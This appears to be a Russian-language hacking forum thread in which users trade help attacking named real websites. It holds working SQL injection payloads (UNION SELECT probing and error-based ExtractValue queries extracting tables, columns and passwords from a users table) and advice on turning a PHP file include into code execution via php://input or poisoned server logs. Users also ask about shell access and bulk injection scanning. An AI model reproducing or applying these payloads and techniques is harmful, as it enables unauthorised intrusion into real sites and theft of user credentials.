Code: Там под фильтр попадают скобки и запятые. http://www.mesta-vstrech.ru/mesto.php?id=1%27+BEGIN:%201%20,%28%29+2+ENDFILTER Code: BEGIN: 1 2 ENDFILTER
А как этим воспользоваться? выдается ошибка по синтаксису.. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' BEGIN: 1 2 ENDFILTER LIMIT 1' at line 1 и как дальше составлять запрос через union select? что то как не составляю все никак...
Человеки, я не силен в php инклудах.. Подскажите пожалуйста, как быть: http://salut.kg/buyer.php?lang=lol P.S: allow_url_fopen = On allow_url_include = Off
помогите роскрутить sql sidbank.pl/index.php?option=com_virtuemart&page=shop.browse&category_id=116&Treeid=3&Itemid=100003&lang=en&vmcchk=1&Itemid=100003' роскручивал havj не мог найти хеши админа помогите пожалуйста
Пробуй инклудить php://input и в тело POST запроса передавать код, который ты хочешь выполнить на сервере. Или же ищи логи, access.logs апача, или логи фтп сервера, потом просто инклуд делай. Да что я расписываю то, куча мануалов на эту тему есть.
Есть сайтец, на нем у меня неполные права у текущего юзера. Есть файл другого пользователя с правами root, который я могу редактировать, но он html, смогу ли я как-то получить шелл этого пользователя? Если да, то как?
сделал @@version() вышло 5.1.41-3ubuntu12.10 кто-нибудь сталкивался с таким? какие дальнейшие действия?
Ну крути дальше. Фильтруется либо @ либо ( и ), это как повезет. Проверь @@version, если получишь результат тот же что и @@version(), то фильтруется скобки. Очевидно же.
Прошу помощи инъекция вида: index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0, ответ: Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 И далее плохая новость ничего не выходит с числами, сколько бы не подставлял. Но есть и хорошая index/page/id/1'+union+select+1,2,3,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0' в конце кавычка и ответ уже: Invalid query: The used SELECT statements have a different number of columns Только вот теперь опять затык. Два сайта если вскроем на общее пользование вынесу. + сайт с xss есть но об этом позже =) если что сайт на Apache/2.2.17
Может немного не в той теме. Хотел узнать: Какая программа проверяет ссылки на наличие скули, но не интересуют программы, которые просто ищут ошибку при подстановке " ' ". Нужно нечто вроде sqlmap, но способная брать список из файла и не требующая никакого ввода от пользователя (скорость работы не особо важна, главное - качество :3) Также устроит, если кто-нибудь подскажет как можно это осуществить через sqlmap
Blind SQL Injection Добрый день уважаемые форумчане. Помогите разобраться в чем проблема, замучился уже. Суть проблемы: Дергаю названия таблиц так: Code: obid=id+and+ExtractValue(1,concat(0x5c,(select+table_name+from+INFORMATION_SCHEMA.tables+LIMIT+0,1)))-- Такой вид потому что прямого вывода на страницу нету, да и ошибки отображаются только в исходном коде страницы. Пошел дальше, получил списки всех таблиц. одна из них users Получаю название колонок: Code: obid=id+and+ExtractValue(1,concat(0x5c,(select+column_name+from+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME='users'+LIMIT+0,1)))-- Получил все нормально. Теперь надо выдернуть значения. Делаю так: Code: obid=id+and+ExtractValue(1,concat(0x5c,(select+pass+from+users+LIMIT+0,1)))-- В ответ получаю: Code: mysql error: Unknown column 'pass' in 'field list' Вопрос, почему говорит что нет такой колонки когда при переборе колонок в таблице users показало что есть pass? ЗЫ в это таблице есть еще несколько колонок, одна из них name, ее видит нормально, а все остальные не видит.
Code: obid=id+and+ExtractValue(1,concat(0x5c,(select+UNHEX(HEX(pass))+from+users+LIMIT+0,1)))-- Выдает: Code: mysql error: Unknown column 'pass' in 'field list'
